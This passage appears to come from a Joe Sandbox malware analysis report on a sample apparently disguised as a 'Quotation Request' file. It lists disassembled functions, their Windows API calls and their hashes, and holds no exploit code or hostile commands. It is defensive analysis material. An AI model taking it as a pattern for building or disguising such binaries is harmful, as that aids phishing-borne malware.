                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0caccf18e9abe59b99afba3dd02ab69150202084fe26d32979a6e0177805a055
                                                      • Instruction ID: 3f5ff96d35ea4e64405a891c53c9eb6e00b7ec70c71f35c40dcdb45cc2f909c4
                                                      • Opcode Fuzzy Hash: 0caccf18e9abe59b99afba3dd02ab69150202084fe26d32979a6e0177805a055
                                                      • Instruction Fuzzy Hash: 7DB10120D2AF404DD32396398935336BA5CBFBB2C5F52E71BFC2674E62EB6285834541
                                                      Function 00838889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __time64.LIBCMT ref: 0083889B
                                                        • Part of subcall function 007F520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00838F6E,00000000,?,?,?,?,0083911F,00000000,?), ref: 007F5213
                                                        • Part of subcall function 007F520A: __aulldiv.LIBCMT ref: 007F5233
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                      • String ID:
                                                      • API String ID: 2893107130-0
                                                      • Opcode ID: bce358af6ff7a189aa3bc005d70cfa26ad72c88e16294cb093f618f268983fb5
                                                      • Instruction ID: a9ceb57c30545748d830c20a9ef527f2608ebbb7754c90757651c5a4f1c9206a
                                                      • Opcode Fuzzy Hash: bce358af6ff7a189aa3bc005d70cfa26ad72c88e16294cb093f618f268983fb5
                                                      • Instruction Fuzzy Hash: 5D21DF32625610CBC729CF29D841A52B3E1FBA4310F298E2CE1F5CB2D0CA34A905CB94
                                                      Function 00834C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00834C4A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: mouse_event
                                                      • String ID:
                                                      • API String ID: 2434400541-0
                                                      • Opcode ID: 679b7c8ff9ca7d2b5ca974cce6ac1676d6abe29f9ac84861c5535ff9bb442028
                                                      • Instruction ID: 1543de08c02d33a747c6c92ccf73cb8035051ac0c81a2a65c1aad849d108aacd
                                                      • Opcode Fuzzy Hash: 679b7c8ff9ca7d2b5ca974cce6ac1676d6abe29f9ac84861c5535ff9bb442028
                                                      • Instruction Fuzzy Hash: 1DD05E9116530D38EC1C07209E0FF7A0108F3C0796FD0B1497201CA1C2ECA87C42A0B1
                                                      Function 008287B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00828389), ref: 008287D1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: LogonUser
                                                      • String ID:
                                                      • API String ID: 1244722697-0
                                                      • Opcode ID: cbe889aeb44c189b56927c65499bc206a88e4c4801c100122fd1d3282595300d
                                                      • Instruction ID: 3dcfbe4cfcd81edcde4b846a815f2070857828a200d0d62e0f5263e10956677e
                                                      • Opcode Fuzzy Hash: cbe889aeb44c189b56927c65499bc206a88e4c4801c100122fd1d3282595300d
                                                      • Instruction Fuzzy Hash: FAD05E32260A0EABEF018EA4DC01EAE3B69EB04B02F408111FE15C50A1C775D835AB60
                                                      Function 007FA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 007FA12A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: f47299b513b44a0a9ddd7bdce32cc53438561f8b9ab8e18be5c822f4db8ccd8a
                                                      • Instruction ID: c0e7cc62d71eb6d461770b464d8e9543eee92babb0937b3015ac005303dd6027
                                                      • Opcode Fuzzy Hash: f47299b513b44a0a9ddd7bdce32cc53438561f8b9ab8e18be5c822f4db8ccd8a
                                                      • Instruction Fuzzy Hash: 19A0113000020CAB8A002F82EC08888BFAEEA002A2B008020FA0C802328B32A8208A80
                                                      Function 007E8808 Relevance: .6, Instructions: 590COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b3660588643056d90d116caa83c2346d3674ac03fcec6ce024ce3f516ee0346f
                                                      • Instruction ID: 9aa2bca27ba3717b8cb8d79f4485762ef271c6bfef5fb16950c09bd8c024ca67
                                                      • Opcode Fuzzy Hash: b3660588643056d90d116caa83c2346d3674ac03fcec6ce024ce3f516ee0346f
                                                      • Instruction Fuzzy Hash: 8B2247309059A6CBDF788A1AE89437C77A1FB09304F28C07AD94ACB592DB789DD1C743
                                                      Function 007F21C5 Relevance: .3, Instructions: 345COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                      • Instruction ID: 3170e4a0e7e6accb5cab6bc82a6b945e0b5a6ec955b0bc1d5ae38e507cbf5335
                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                      • Instruction Fuzzy Hash: 7BC1B8322050974ADF2D463AC43403EFBB16EA27B135A075DD9B3CF6D5EE28C926D620
                                                      Function 007F25FA Relevance: .3, Instructions: 341COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                      • Instruction ID: 2785c90c925a043928653eee5c639d1991e770c6392605c43f40ba59ea7c4c0f
                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                      • Instruction Fuzzy Hash: 80C1E6322050974ADF2D463AC43403EFBA16FA27B135A076DD5B3DF6D5EE28C926D620
                                                      Function 007F1978 Relevance: .3, Instructions: 323COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                      • Instruction ID: d297d62befc72840bb8e940312cbbdf14f78c7a87dcda0b6a8d203c74959da2f
                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                      • Instruction Fuzzy Hash: 98C1A53230519789DF2D463AC43403EFBB16EA27B179A076DD5B3CB6C4EE28C925D620
                                                      Function 00847806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 0084785B
                                                      • DeleteObject.GDI32(00000000), ref: 0084786D
                                                      • DestroyWindow.USER32 ref: 0084787B
                                                      • GetDesktopWindow.USER32 ref: 00847895
                                                      • GetWindowRect.USER32(00000000), ref: 0084789C
                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 008479DD
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 008479ED
                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847A35
                                                      • GetClientRect.USER32(00000000,?), ref: 00847A41
                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00847A7B
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847A9D
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847AB0
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847ABB
                                                      • GlobalLock.KERNEL32(00000000), ref: 00847AC4
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847AD3
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00847ADC
                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847AE3
                                                      • GlobalFree.KERNEL32(00000000), ref: 00847AEE
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847B00
                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00862CAC,00000000), ref: 00847B16
                                                      • GlobalFree.KERNEL32(00000000), ref: 00847B26
                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00847B4C
                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00847B6B
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847B8D
                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00847D7A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                      • API String ID: 2211948467-2373415609
                                                      • Opcode ID: 54dda8b6233c34fdb5037e7b4c5ead7f87c2a9ce685ae7c9e4bae8be8b3ac03d
                                                      • Instruction ID: 8deb4dc667128d71b582f98612fd4d58374e3ab33acd6facdd896a31eada243d
                                                      • Opcode Fuzzy Hash: 54dda8b6233c34fdb5037e7b4c5ead7f87c2a9ce685ae7c9e4bae8be8b3ac03d
                                                      • Instruction Fuzzy Hash: 82023B71900219EFDB14DFA4DD89EAE7BB9FB48311F148169FA15EB2A1C7389D01CB60
                                                      Function 0085356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?,0085F910), ref: 00853627
                                                      • IsWindowVisible.USER32(?), ref: 0085364B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpperVisibleWindow
                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                      • API String ID: 4105515805-45149045
                                                      • Opcode ID: d25f21b4ff0d40415d98de02dbdde2652012513e30846057d3dae979d1d3f6a7
                                                      • Instruction ID: 5b6d642217372ae210f88330a833c0341e70ee4a196d1e6f92f71237ba32715e
                                                      • Opcode Fuzzy Hash: d25f21b4ff0d40415d98de02dbdde2652012513e30846057d3dae979d1d3f6a7
                                                      • Instruction Fuzzy Hash: AAD17970204705DBCA04EF14C559A6E7BE1FF94395F048469FD82DB3A2DB25EA4ECB82
                                                      Function 0085A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetTextColor.GDI32(?,00000000), ref: 0085A630
                                                      • GetSysColorBrush.USER32(0000000F), ref: 0085A661
                                                      • GetSysColor.USER32(0000000F), ref: 0085A66D
                                                      • SetBkColor.GDI32(?,000000FF), ref: 0085A687
                                                      • SelectObject.GDI32(?,00000000), ref: 0085A696
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0085A6C1
                                                      • GetSysColor.USER32(00000010), ref: 0085A6C9
                                                      • CreateSolidBrush.GDI32(00000000), ref: 0085A6D0
                                                      • FrameRect.USER32(?,?,00000000), ref: 0085A6DF
                                                      • DeleteObject.GDI32(00000000), ref: 0085A6E6
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0085A731
                                                      • FillRect.USER32(?,?,00000000), ref: 0085A763
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0085A78E
                                                        • Part of subcall function 0085A8CA: GetSysColor.USER32(00000012), ref: 0085A903
                                                        • Part of subcall function 0085A8CA: SetTextColor.GDI32(?,?), ref: 0085A907
                                                        • Part of subcall function 0085A8CA: GetSysColorBrush.USER32(0000000F), ref: 0085A91D
                                                        • Part of subcall function 0085A8CA: GetSysColor.USER32(0000000F), ref: 0085A928
                                                        • Part of subcall function 0085A8CA: GetSysColor.USER32(00000011), ref: 0085A945
                                                        • Part of subcall function 0085A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0085A953
                                                        • Part of subcall function 0085A8CA: SelectObject.GDI32(?,00000000), ref: 0085A964
                                                        • Part of subcall function 0085A8CA: SetBkColor.GDI32(?,00000000), ref: 0085A96D
                                                        • Part of subcall function 0085A8CA: SelectObject.GDI32(?,?), ref: 0085A97A
                                                        • Part of subcall function 0085A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0085A999
                                                        • Part of subcall function 0085A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0085A9B0
                                                        • Part of subcall function 0085A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0085A9C5
                                                        • Part of subcall function 0085A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0085A9ED
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 3521893082-0
                                                      • Opcode ID: b5ee6f862ad5b4a5d85253ae3eed6dae10ec4219788e6b30437296f9ed06c3a2
                                                      • Instruction ID: 5ce28ceea1909f77e11fd79739945c1fb272ef9d86c9c945a8e7cf32ff9d6894
                                                      • Opcode Fuzzy Hash: b5ee6f862ad5b4a5d85253ae3eed6dae10ec4219788e6b30437296f9ed06c3a2
                                                      • Instruction Fuzzy Hash: 1F917D72008305EFCB119F64DC48A5B7BE9FB88322F144B29FAA2D61E2D735D944CB52
                                                      Function 007D2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?), ref: 007D2CA2
                                                      • DeleteObject.GDI32(00000000), ref: 007D2CE8
                                                      • DeleteObject.GDI32(00000000), ref: 007D2CF3
                                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 007D2CFE
                                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 007D2D09
                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0080C43B
                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0080C474
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0080C89D
                                                        • Part of subcall function 007D1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007D2036,?,00000000,?,?,?,?,007D16CB,00000000,?), ref: 007D1B9A
                                                      • SendMessageW.USER32(?,00001053), ref: 0080C8DA
                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0080C8F1
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0080C907
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0080C912
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                      • String ID: 0
                                                      • API String ID: 464785882-4108050209
                                                      • Opcode ID: e1d9e0ecb7214f2ac32e1218ac4de5e7bbc8c327bb6e06900b9a7ddba4cbe30d
                                                      • Instruction ID: 7f354c5c0a3dcb475661f3439542d4e59d20ecae28d12f4ace2777eb7e8f3ea0
                                                      • Opcode Fuzzy Hash: e1d9e0ecb7214f2ac32e1218ac4de5e7bbc8c327bb6e06900b9a7ddba4cbe30d
                                                      • Instruction Fuzzy Hash: E1128E30600201EFDB65CF24C988BA9BBF5FF54301F54466AE959CB2A2C735EC42DBA1
                                                      Function 008474AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(00000000), ref: 008474DE
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0084759D
                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008475DB
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 008475ED
                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00847633
                                                      • GetClientRect.USER32(00000000,?), ref: 0084763F
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00847683
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00847692
                                                      • GetStockObject.GDI32(00000011), ref: 008476A2
                                                      • SelectObject.GDI32(00000000,00000000), ref: 008476A6
                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008476B6
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008476BF
                                                      • DeleteDC.GDI32(00000000), ref: 008476C8
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008476F4
                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 0084770B
                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00847746
                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0084775A
                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 0084776B
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0084779B
                                                      • GetStockObject.GDI32(00000011), ref: 008477A6
                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008477B1
                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 008477BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
